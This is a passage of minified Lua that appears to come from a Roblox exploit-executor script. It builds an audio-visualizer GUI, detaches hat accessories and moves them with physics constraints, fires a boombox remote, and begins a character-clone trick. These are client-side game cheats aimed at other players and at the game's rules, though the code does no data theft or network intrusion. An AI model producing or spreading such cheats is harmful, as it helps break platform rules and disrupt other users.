gui"sJ.TextSize=14;sJ.TextWrapped=true;sK.Name="open"sK.Parent=sC;sK.BackgroundColor3=Color3.new(0.666667,1,1)sK.BackgroundTransparency=0.44999998807907;sK.BorderColor3=Color3.new(0.207843,0.0901961,0.0705882)sK.BorderSizePixel=3;sK.Position=UDim2.new(0,0,0,400)sK.Size=UDim2.new(0,59,0,50)sK.Font=Enum.Font.SourceSans;sK.FontSize=Enum.FontSize.Size28;sK.Text="Open"sK.TextSize=28;sK.Visible=false;sL.Name="set2"sL.Parent=jI;sL.BackgroundColor3=Color3.new(0.666667,1,1)sL.BackgroundTransparency=0.44999998807907;sL.BorderColor3=Color3.new(0.207843,0.0901961,0.0705882)sL.BorderSizePixel=3;sL.Position=UDim2.new(0,325,0,136)sL.Size=UDim2.new(0,55,0,25)sL.Font=Enum.Font.SourceSans;sL.FontSize=Enum.FontSize.Size24;sL.Text="Set"sL.TextSize=24;sL.TextWrapped=true;sM.Name="set1"sM.Parent=jI;sM.BackgroundColor3=Color3.new(0.666667,1,1)sM.BackgroundTransparency=0.44999998807907;sM.BorderColor3=Color3.new(0.207843,0.0901961,0.0705882)sM.BorderSizePixel=3;sM.Position=UDim2.new(0,181,0,136)sM.Size=UDim2.new(0,55,0,25)sM.Font=Enum.Font.SourceSans;sM.FontSize=Enum.FontSize.Size24;sM.Text="Set"sM.TextSize=24;sM.TextWrapped=true;sN.Name="loop"sN.Parent=jI;sN.BackgroundColor3=Color3.new(0.666667,1,1)sN.BackgroundTransparency=0.44999998807907;sN.BorderColor3=Color3.new(0.207843,0.0901961,0.0705882)sN.BorderSizePixel=3;sN.Position=UDim2.new(0,241,0,188)sN.Size=UDim2.new(0,84,0,25)sN.Font=Enum.Font.SourceSans;sN.FontSize=Enum.FontSize.Size18;sN.Text="Loop : OFF"sN.TextSize=18;sN.TextWrapped=true;function start()wait(0.5)jI.Position=UDim2.new(0,-500,0,400)jI.Visible=true;jI:TweenPosition(UDim2.new(0,0,0,400),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,1)end;if game:GetService("Players").LocalPlayer.Character then start()else print'character not found plz try again XD'end;function minimize()jI:TweenPosition(UDim2.new(0,0,0,400),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,1)sJ.Text=""sI.Text=""sH.Text=""sE.Text=""sG.Text=""sF.Text=""sD.Text=""sM.Text=""sL.Text=""sN.Text=""jI:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sJ:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sI:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sH:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sD:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sF:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sE:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sG:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sN:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sM:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sL:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)jI:TweenPosition(UDim2.new(0,0,0,400),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)wait(0.5)jI.Visible=false;sK.Visible=true end;function show()sK.Visible=false;jI.Position=UDim2.new(0,-500,0,400)jI.Visible=true;sJ.Text="credits to me for gui, i didn't make the visualizer credits to whoever leaked it or made it."sI.Text="-"sH.Text="X"sE.Text="Play"sG.Text="Pitch"sF.Text="Volume"sD.Text="Put ID plz"sM.Text="Set"sL.Text="Set"sN.Text="Loop : OFF"jI:TweenSize(UDim2.new(0,418,0,213),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sJ:TweenSize(UDim2.new(0,200,0,52),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sI:TweenSize(UDim2.new(0,25,0,23),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sH:TweenSize(UDim2.new(0,25,0,23),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sD:TweenSize(UDim2.new(0,418,0,50),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sF:TweenSize(UDim2.new(0,117,0,50),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sE:TweenSize(UDim2.new(0,117,0,50),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sG:TweenSize(UDim2.new(0,117,0,50),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sM:TweenSize(UDim2.new(0,55,0,25),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sN:TweenSize(UDim2.new(0,84,0,25),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sL:TweenSize(UDim2.new(0,55,0,25),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)jI:TweenPosition(UDim2.new(0,0,0,400),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)end;function exitdatshit()jI:TweenPosition(UDim2.new(0,0,0,400),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,1)sJ.Text=""sI.Text=""sH.Text=""sE.Text=""sG.Text=""sF.Text=""sD.Text=""jI:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sJ:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sI:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sH:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sD:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sF:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sE:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sG:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sM:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sL:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sN:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)jI:TweenPosition(UDim2.new(0,0,0,400),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)wait(0.5)sC:Destroy()end;wait(1)sI.MouseButton1Down:connect(function()minimize()end)sK.MouseButton1Down:connect(function()show()end)sH.MouseButton1Down:connect(function()exitdatshit()end)sM.MouseButton1Down:connect(function()sound.Volume=sF.Text end)sL.MouseButton1Down:connect(function()sound.Pitch=sG.Text end)sE.MouseButton1Down:connect(function()sound.TimePosition=0;sound.SoundId="rbxassetid://"..sD.Text;game:GetService("Players").LocalPlayer.Character.SuperFlyGoldBoombox.Remote:FireServer("PlaySong",sD.text)end)sN.MouseButton1Down:connect(function()if sN.Text=="Loop : OFF"then sound.Looped=true;sN.Text="Loop : ON"else sound.Looped=false;sN.Text="Loop : OFF"end end)Character["Torso"].Part.Name="Part"Character["Torso"].Part.Name="Part1"Character["Torso"].Part.Name="Part2"Character["Torso"].Part.Name="Part3"Character["Torso"].Part.Name="Part4"Character["Torso"].Part.Name="Part5"Character["Torso"].Part.Name="Part6"Character["Torso"].Part.Name="Part7"Character["Torso"].Part.Name="Part8"Character["Torso"].Part.Name="Part9"W(R.one.Handle,Character["Torso"].Part)W(R.two.Handle,Character["Torso"].Part1)W(R.three.Handle,Character["Torso"].Part2)W(R.four.Handle,Character["Torso"].Part3)W(R.five.Handle,Character["Torso"].Part4)W(R.six.Handle,Character["Torso"].Part5)W(R.seven.Handle,Character["Torso"].Part6)W(R.eight.Handle,Character["Torso"].Part7)W(R.nine.Handle,Character["Torso"].Part8)W(R.ten.Handle,Character["Torso"].Part9)R.one.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.two.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.three.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.four.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.five.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.six.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.seven.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.eight.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.nine.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.ten.Handle.Attachment.Rotation=Vector3.new(0,0,0)Character:WaitForChild("Torso").Part:FindFirstChild("Attachment").Name="Attachment1"Character:WaitForChild("Torso").Part1:FindFirstChild("Attachment").Name="Attachment1"Character:WaitForChild("Torso").Part2:FindFirstChild("Attachment").Name="Attachment1"Character:WaitForChild("Torso").Part3:FindFirstChild("Attachment").Name="Attachment1"Character:WaitForChild("Torso").Part4:FindFirstChild("Attachment").Name="Attachment1"Character:WaitForChild("Torso").Part5:FindFirstChild("Attachment").Name="Attachment1"Character:WaitForChild("Torso").Part6:FindFirstChild("Attachment").Name="Attachment1"Character:WaitForChild("Torso").Part7:FindFirstChild("Attachment").Name="Attachment1"Character:WaitForChild("Torso").Part8:FindFirstChild("Attachment").Name="Attachment1"Character:WaitForChild("Torso").Part9:FindFirstChild("Attachment").Name="Attachment1"Character:WaitForChild("Torso").Part.Attachment1.Position=Vector3.new(0,0,0.75)Character:WaitForChild("Torso").Part1.Attachment1.Position=Vector3.new(0,0,0.75)Character:WaitForChild("Torso").Part2.Attachment1.Position=Vector3.new(0,0,0.75)Character:WaitForChild("Torso").Part3.Attachment1.Position=Vector3.new(0,0,0.75)Character:WaitForChild("Torso").Part4.Attachment1.Position=Vector3.new(0,0,0.75)Character:WaitForChild("Torso").Part5.Attachment1.Position=Vector3.new(0,0,0.75)Character:WaitForChild("Torso").Part6.Attachment1.Position=Vector3.new(0,0,0.75)Character:WaitForChild("Torso").Part7.Attachment1.Position=Vector3.new(0,0,0.75)Character:WaitForChild("Torso").Part8.Attachment1.Position=Vector3.new(0,0,0.75)Character:WaitForChild("Torso").Part9.Attachment1.Position=Vector3.new(0,0,0.75)end)end;function Clickey17()pcall(function()local Player=game:GetService("Players").LocalPlayer;local Character=Player.Character;Character.MeshPartAccessory.Name="MeshPartAccessory1"Character["International Fedora"].Name="International Fedora1"Character["International Fedora"].Name="International Fedora2"Character["International Fedora"].Name="International Fedora3"Character.InternationalFedora.Name="InternationalFedora1"Character.InternationalFedora.Name="InternationalFedora2"Character.InternationalFedora.Name="InternationalFedora3"local R={one=Character:WaitForChild("MeshPartAccessory1"),two=Character:WaitForChild("International Fedora1"),three=Character:WaitForChild("International Fedora2"),four=Character:WaitForChild("InternationalFedora1"),five=Character:WaitForChild("MeshPartAccessory"),six=Character:WaitForChild("InternationalFedora2"),seven=Character:WaitForChild("International Fedora3"),eight=Character:WaitForChild("International Fedora"),nine=Character:WaitForChild("InternationalFedora3"),ten=Character:WaitForChild("InternationalFedora")}for T,v in next,R do v.Handle.AccessoryWeld:Remove()for U,V in next,v:GetDescendants()do if V:IsA("Mesh")or V:IsA("SpecialMesh")then V:Remove()end end end;Character.Head.Transparency=0;Character.Torso.Transparency=0;Character["Right Arm"].Transparency=0;Character["Left Arm"].Transparency=0;Character["Right Leg"].Transparency=0;Character["Left Leg"].Transparency=0;local function W(T,v)local X=Instance.new("Attachment",T)X.Position=Vector3.new(0,0,0)local Y=Instance.new("Attachment",v)Y.Position=Vector3.new(0,0,0)local Z=Instance.new("AlignPosition",T)Z.Attachment0=X;Z.Attachment1=Y;Z.RigidityEnabled=false;Z.ReactionForceEnabled=false;Z.ApplyAtCenterOfMass=true;Z.MaxForce=9999999;Z.MaxVelocity=math.huge;Z.Responsiveness=50;local _=Instance.new("AlignOrientation",T)_.Attachment0=X;_.Attachment1=Y;_.ReactionTorqueEnabled=true;_.PrimaryAxisOnly=false;_.MaxTorque=9999999;_.MaxAngularVelocity=math.huge;_.Responsiveness=50 end;local Player=game:GetService("Players").LocalPlayer;local Character=Player.Character;local sO=Character["Head"]local sP=4;local sQ=Instance.new('Part',Character)sQ.Size=Vector3.new(20,15,20)sQ.Anchored=true;sQ.CanCollide=false;sQ.Transparency=1;local sR=Instance.new('SpecialMesh',sQ)sR.Scale=Vector3.new(25,10,25)sR.MeshId="http://www.roblox.com/asset/?id=1095708"sR.Offset=Vector3.new(0,0,0)local sw=0;local dA=Instance.new('Sound',sQ)dA.SoundId="rbxassetid://0"dA.Looped=true;dA.Volume=0;dA.MaxDistance=100;dA:Play()local Rain=Instance.new('ParticleEmitter',sQ)Rain.Color=ColorSequence.new(Color3.new(1,1,1),Color3.fromRGB(175,255,255))Rain.Size=NumberSequence.new(.5)Rain.Texture="http://www.roblox.com/asset/?id=0"Rain.Transparency=NumberSequence.new(0,.6)Rain.Acceleration=Vector3.new(0,-150,0)Rain.Lifetime=NumberRange.new(5,10)Rain.Rate=0;local q7=math.rad;local sS=math.sin;local sT=math.tan;local sU=math.cos;function Weld(x,iP)local c4=Instance.new("Weld")c4.Part0=x;c4.Part1=iP;c4.Name=tostring(iP.Name).."_Weld"c4.Parent=x;return c4 end;function Clerp(start,sV,sW)local function slerp(a,b,c)return(1-c)*a+c*b end;local dG={start.X,start.Y,start.Z,start:toEulerAnglesXYZ()}local qw={sV.X,sV.Y,sV.Z,sV:toEulerAnglesXYZ()}for T,v in pairs(dG)do dG[T]=slerp(v,qw[T],sW)end;return CFrame.new(dG[1],dG[2],dG[3])*CFrame.Angles(dG[4],dG[5],dG[6])end;Character.Part.Name="Bruh"local a7=game:GetService("Players").LocalPlayer.Character;local hrp=a7:WaitForChild("HumanoidRootPart")local sX={}local sY=10;for U=1,sY do table.insert(sX,Instance.new("Part"))end;for T,ec in pairs(sX)do ec.Anchored=true;ec.CanCollide=false;ec.Parent=a7;ec.Transparency=1 end;local sZ=2*math.pi;local s_=10;local function t0(gs)local x=math.cos(gs)*s_;local z=math.sin(gs)*s_;return x,z end;game:GetService("RunService").Heartbeat:Connect(function()for T,ec in pairs(sX)do local gs=T*sZ/#sX;local x,z=t0(gs)local ad=(hrp.CFrame*CFrame.new(x,0,z)).p;local t1=hrp.Position;ec.CFrame=CFrame.new(ad)end end)Character.Part.Name="Part"Character.Part.Name="Part1"Character.Part.Name="Part2"Character.Part.Name="Part3"Character.Part.Name="Part4"Character.Part.Name="Part5"Character.Part.Name="Part6"Character.Part.Name="Part7"Character.Part.Name="Part8"Character.Part.Name="Part9"W(R.one.Handle,Character.Part)W(R.two.Handle,Character.Part1)W(R.three.Handle,Character.Part2)W(R.four.Handle,Character.Part3)W(R.five.Handle,Character.Part4)W(R.six.Handle,Character.Part5)W(R.seven.Handle,Character.Part6)W(R.eight.Handle,Character.Part7)W(R.nine.Handle,Character.Part8)W(R.ten.Handle,Character.Part9)Character:WaitForChild("Part"):FindFirstChild("Attachment").Name="Attachment420"Character:WaitForChild("Part1"):FindFirstChild("Attachment").Name="Attachment420"Character:WaitForChild("Part2"):FindFirstChild("Attachment").Name="Attachment420"Character:WaitForChild("Part3"):FindFirstChild("Attachment").Name="Attachment420"Character:WaitForChild("Part4"):FindFirstChild("Attachment").Name="Attachment420"Character:WaitForChild("Part5"):FindFirstChild("Attachment").Name="Attachment420"Character:WaitForChild("Part6"):FindFirstChild("Attachment").Name="Attachment420"Character:WaitForChild("Part7"):FindFirstChild("Attachment").Name="Attachment420"Character:WaitForChild("Part8"):FindFirstChild("Attachment").Name="Attachment420"Character:WaitForChild("Part9"):FindFirstChild("Attachment").Name="Attachment420"coroutine.resume(coroutine.create(function()while true do cum=math.random(40,100)cum2=math.random(40,100)cum3=math.random(40,100)wait(0.1)end end))coroutine.resume(coroutine.create(function()while true do Rain.Rate=(dA.PlaybackLoudness+50)*sP;game:GetService('RunService').RenderStepped:wait()local t2=sO.CFrame.p;local t3=dA.PlaybackLoudness/cum+5;local t4=dA.PlaybackLoudness/cum2+5;local t5=dA.PlaybackLoudness/cum3+5;sQ.Size=Vector3.new(t3,15,t3)Character:WaitForChild("Part").Attachment420.Position=Vector3.new(0,t3-7.5,0)Character:WaitForChild("Part1").Attachment420.Position=Vector3.new(0,t4-7.5,0)Character:WaitForChild("Part2").Attachment420.Position=Vector3.new(0,t5-7.5,0)Character:WaitForChild("Part3").Attachment420.Position=Vector3.new(0,t4-7.5,0)Character:WaitForChild("Part4").Attachment420.Position=Vector3.new(0,t3-7.5,0)Character:WaitForChild("Part5").Attachment420.Position=Vector3.new(0,t4-7.5,0)Character:WaitForChild("Part6").Attachment420.Position=Vector3.new(0,t5-7.5,0)Character:WaitForChild("Part7").Attachment420.Position=Vector3.new(0,t5-7.5,0)Character:WaitForChild("Part8").Attachment420.Position=Vector3.new(0,t4-7.5,0)Character:WaitForChild("Part9").Attachment420.Position=Vector3.new(0,t3-7.5,0)sR.Scale=Vector3.new(t3,10,t3)sQ.CFrame=Clerp(sQ.CFrame,CFrame.new(t2+Vector3.new(0,4,0))*CFrame.Angles(0,q7(90),0),.1)sQ.BrickColor=BrickColor.new(Color3.fromRGB(255-dA.PlaybackLoudness*1.1,255-dA.PlaybackLoudness*1.1,255-dA.PlaybackLoudness*1.1))end end))local sC=Instance.new("ScreenGui")local jI=Instance.new("Frame")local sD=Instance.new("TextBox")local sE=Instance.new("TextButton")local sF=Instance.new("TextBox")local sG=Instance.new("TextBox")local sH=Instance.new("TextButton")local sI=Instance.new("TextButton")local sJ=Instance.new("TextLabel")local sK=Instance.new("TextButton")local sL=Instance.new("TextButton")local sM=Instance.new("TextButton")local sN=Instance.new("TextButton")sC.Name="visualizergui"sC.Parent=game:GetService("Players").LocalPlayer.PlayerGui;jI.Parent=sC;jI.BackgroundColor3=Color3.new(0.701961,0.952941,1)jI.BackgroundTransparency=0.20000000298023;jI.BorderColor3=Color3.new(0.211765,0.329412,0.415686)jI.BorderSizePixel=8;jI.Position=UDim2.new(0,51,0,213)jI.Size=UDim2.new(0,418,0,213)jI.Active=true;jI.Draggable=true;jI.Visible=false;sD.Name="idvalue"sD.Parent=jI;sD.BackgroundColor3=Color3.new(0.666667,1,1)sD.BackgroundTransparency=0.5;sD.Size=UDim2.new(0,418,0,50)sD.Font=Enum.Font.Fantasy;sD.FontSize=Enum.FontSize.Size24;sD.Text="Put ID plz"sD.TextSize=24;sE.Name="play"sE.Parent=jI;sE.BackgroundColor3=Color3.new(0.666667,1,1)sE.BackgroundTransparency=0.44999998807907;sE.BorderColor3=Color3.new(0.207843,0.0901961,0.0705882)sE.BorderSizePixel=3;sE.Position=UDim2.new(0,9,0,82)sE.Size=UDim2.new(0,117,0,50)sE.Font=Enum.Font.SourceSans;sE.FontSize=Enum.FontSize.Size28;sE.Text="Play"sE.TextSize=28;sF.Name="volume"sF.Parent=jI;sF.BackgroundColor3=Color3.new(0.666667,1,1)sF.BackgroundTransparency=0.44999998807907;sF.BorderColor3=Color3.new(0.207843,0.0901961,0.0705882)sF.BorderSizePixel=3;sF.Position=UDim2.new(0,151,0,82)sF.Size=UDim2.new(0,117,0,50)sF.Font=Enum.Font.SourceSans;sF.FontSize=Enum.FontSize.Size28;sF.Text="Volume"sF.TextSize=28;sG.Name="pitch"sG.Parent=jI;sG.BackgroundColor3=Color3.new(0.666667,1,1)sG.BackgroundTransparency=0.44999998807907;sG.BorderColor3=Color3.new(0.207843,0.0901961,0.0705882)sG.BorderSizePixel=3;sG.Position=UDim2.new(0,291,0,82)sG.Size=UDim2.new(0,117,0,50)sG.Font=Enum.Font.SourceSans;sG.FontSize=Enum.FontSize.Size28;sG.Text="Pitch"sG.TextSize=28;sH.Name="close"sH.Parent=jI;sH.BackgroundColor3=Color3.new(1,0,0.0156863)sH.BackgroundTransparency=0.40000000596046;sH.Position=UDim2.new(0,393,0,190)sH.Size=UDim2.new(0,25,0,23)sH.Font=Enum.Font.SourceSans;sH.FontSize=Enum.FontSize.Size28;sH.Text="X"sH.TextSize=28;sI.Name="min"sI.Parent=jI;sI.BackgroundColor3=Color3.new(0.286275,0.286275,1)sI.BackgroundTransparency=0.40000000596046;sI.Position=UDim2.new(0,357,0,190)sI.Size=UDim2.new(0,25,0,23)sI.Font=Enum.Font.SourceSans;sI.FontSize=Enum.FontSize.Size36;sI.Text="-"sI.TextSize=36;sJ.Name="credits"sJ.Parent=jI;sJ.BackgroundColor3=Color3.new(1,1,1)sJ.BackgroundTransparency=1;sJ.Position=UDim2.new(0,0,0,161)sJ.Size=UDim2.new(0,200,0,52)sJ.Font=Enum.Font.SourceSans;sJ.FontSize=Enum.FontSize.Size14;sJ.Text="credits to mr steal yo bork for gui"sJ.TextSize=14;sJ.TextWrapped=true;sK.Name="open"sK.Parent=sC;sK.BackgroundColor3=Color3.new(0.666667,1,1)sK.BackgroundTransparency=0.44999998807907;sK.BorderColor3=Color3.new(0.207843,0.0901961,0.0705882)sK.BorderSizePixel=3;sK.Position=UDim2.new(0,0,0,400)sK.Size=UDim2.new(0,59,0,50)sK.Font=Enum.Font.SourceSans;sK.FontSize=Enum.FontSize.Size28;sK.Text="Open"sK.TextSize=28;sK.Visible=false;sL.Name="set2"sL.Parent=jI;sL.BackgroundColor3=Color3.new(0.666667,1,1)sL.BackgroundTransparency=0.44999998807907;sL.BorderColor3=Color3.new(0.207843,0.0901961,0.0705882)sL.BorderSizePixel=3;sL.Position=UDim2.new(0,325,0,136)sL.Size=UDim2.new(0,55,0,25)sL.Font=Enum.Font.SourceSans;sL.FontSize=Enum.FontSize.Size24;sL.Text="Set"sL.TextSize=24;sL.TextWrapped=true;sM.Name="set1"sM.Parent=jI;sM.BackgroundColor3=Color3.new(0.666667,1,1)sM.BackgroundTransparency=0.44999998807907;sM.BorderColor3=Color3.new(0.207843,0.0901961,0.0705882)sM.BorderSizePixel=3;sM.Position=UDim2.new(0,181,0,136)sM.Size=UDim2.new(0,55,0,25)sM.Font=Enum.Font.SourceSans;sM.FontSize=Enum.FontSize.Size24;sM.Text="Set"sM.TextSize=24;sM.TextWrapped=true;sN.Name="loop"sN.Parent=jI;sN.BackgroundColor3=Color3.new(0.666667,1,1)sN.BackgroundTransparency=0.44999998807907;sN.BorderColor3=Color3.new(0.207843,0.0901961,0.0705882)sN.BorderSizePixel=3;sN.Position=UDim2.new(0,241,0,188)sN.Size=UDim2.new(0,84,0,25)sN.Font=Enum.Font.SourceSans;sN.FontSize=Enum.FontSize.Size18;sN.Text="Loop : OFF"sN.TextSize=18;sN.TextWrapped=true;function start()wait(0.5)jI.Position=UDim2.new(0,-500,0,400)jI.Visible=true;jI:TweenPosition(UDim2.new(0,0,0,400),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,1)end;if game:GetService("Players").LocalPlayer.Character then start()else print'character not found plz try again XD'end;function minimize()jI:TweenPosition(UDim2.new(0,0,0,400),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,1)sI.Text=""sH.Text=""sE.Text=""sG.Text=""sF.Text=""sD.Text=""sM.Text=""sL.Text=""sN.Text=""jI:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sJ:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sI:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sH:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sD:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sF:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sE:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sG:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sN:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sM:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sL:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)jI:TweenPosition(UDim2.new(0,0,0,400),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)wait(0.5)jI.Visible=false;sK.Visible=true end;function show()sK.Visible=false;jI.Position=UDim2.new(0,-500,0,400)jI.Visible=true;sJ.Text="credits to me for gui, i didn't make the visualizer credits to whoever leaked it or made it."sI.Text="-"sH.Text="X"sE.Text="Play"sG.Text="Pitch"sF.Text="Volume"sD.Text="Put ID plz"sM.Text="Set"sL.Text="Set"sN.Text="Loop : OFF"jI:TweenSize(UDim2.new(0,418,0,213),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sJ:TweenSize(UDim2.new(0,200,0,52),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sI:TweenSize(UDim2.new(0,25,0,23),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sH:TweenSize(UDim2.new(0,25,0,23),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sD:TweenSize(UDim2.new(0,418,0,50),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sF:TweenSize(UDim2.new(0,117,0,50),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sE:TweenSize(UDim2.new(0,117,0,50),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sG:TweenSize(UDim2.new(0,117,0,50),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sM:TweenSize(UDim2.new(0,55,0,25),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sN:TweenSize(UDim2.new(0,84,0,25),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sL:TweenSize(UDim2.new(0,55,0,25),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)jI:TweenPosition(UDim2.new(0,0,0,400),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)end;function exitdatshit()jI:TweenPosition(UDim2.new(0,0,0,400),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,1)sJ.Text=""sI.Text=""sH.Text=""sE.Text=""sG.Text=""sF.Text=""sD.Text=""jI:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sJ:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sI:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sH:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sD:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sF:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sE:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sG:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sM:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sL:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sN:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)jI:TweenPosition(UDim2.new(0,0,0,400),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)wait(0.5)sC:Destroy()end;wait(1)sI.MouseButton1Down:connect(function()minimize()end)sK.MouseButton1Down:connect(function()show()end)sH.MouseButton1Down:connect(function()exitdatshit()end)sM.MouseButton1Down:connect(function()dA.Volume=sF.Text end)sL.MouseButton1Down:connect(function()dA.Pitch=sG.Text end)sE.MouseButton1Down:connect(function()dA.TimePosition=0;dA.SoundId="rbxassetid://"..sD.Text;game:GetService("Players").LocalPlayer.Character.SuperFlyGoldBoombox.Remote:FireServer("PlaySong",sD.text)end)sN.MouseButton1Down:connect(function()if sN.Text=="Loop : OFF"then dA.Looped=true;sN.Text="Loop : ON"else dA.Looped=false;sN.Text="Loop : OFF"end end)end)end;function Clickey18()pcall(function()Players=game:GetService('Players')LocalPlayer=Players.LocalPlayer;Char=LocalPlayer.Character;Char.Archivable=true;FakeChar=Char:Clone()FakeChar.Parent=workspace;FakeChar.Name="Interaxis Is Hot"workspace.CurrentCamera.CameraSubject=FakeChar.Humanoid;for T,v in pairs(FakeChar:GetDescendants())do if v:IsA("Part")then v.Transparency=1 end;if v:IsA("SpecialMesh")then v.MeshId="rbxassetid://0"end 